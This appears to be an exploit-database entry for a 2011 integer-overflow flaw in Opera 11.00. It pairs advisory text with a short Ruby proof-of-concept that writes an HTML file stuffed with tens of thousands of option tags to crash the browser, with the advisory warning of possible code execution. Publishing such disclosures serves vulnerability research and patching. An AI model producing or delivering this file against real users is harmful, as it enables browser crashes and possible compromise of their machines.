Opera Web Browser Remote Integer-Overflow Vulnerability

vendor:

Opera Web Browser

by:

SecurityFocus

9.3

CVSS

HIGH

Integer-Overflow

190

CWE

Product Name: Opera Web Browser

Affected Version From: Opera 11.00

Affected Version To: Opera 11.00

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Opera Web Browser Remote Integer-Overflow Vulnerability

Opera Web Browser is prone to a remote integer-overflow vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions. The vulnerability exists due to a boundary error when handling HTML code containing a large number of <option> tags. An attacker can exploit this issue to execute arbitrary code within the context of the application.

Mitigation:

No known mitigation is available.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46003/info

Opera Web Browser is prone to a remote integer-overflow vulnerability.

Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.

Opera 11.00 is vulnerable; other versions may also be affected.

print "[*]Creating the Exploit\n"
i = 0
buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
 
while i<0x4141
     buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
     i+=1
end
 
HTML =
"<html>\n"+
"<body>\n\n"+
"<select>\n\n"
 
HTML+=buf * 100
HTML += "\n\n\n\</select>\n\n"+
"</body>\n\n\n"+
"</html>\n\n\n\n\n"
 
f = File.open("Exploit_opera_11.00.html","w")
f.puts HTML
f.close
puts "\n\n\[*]File Created With Sucess"
sleep(1)
puts "[*]Go to my Site www.invasao.com.br!"
sleep(1)